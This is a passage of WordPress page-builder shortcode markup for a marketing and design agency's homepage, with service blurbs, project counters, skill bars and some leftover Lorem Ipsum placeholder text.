&amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/Screenshot-2020-07-19-at-2.05.17-AM.png\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.1\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/63368-2.png\" alt=\"Why We\" title_text=\"Best Agency to choose\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.1\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.1\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Artboard-3.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\" hover_enabled=\"0\" alt=\"creative services\" title_text=\"Creative services\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" hover_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" 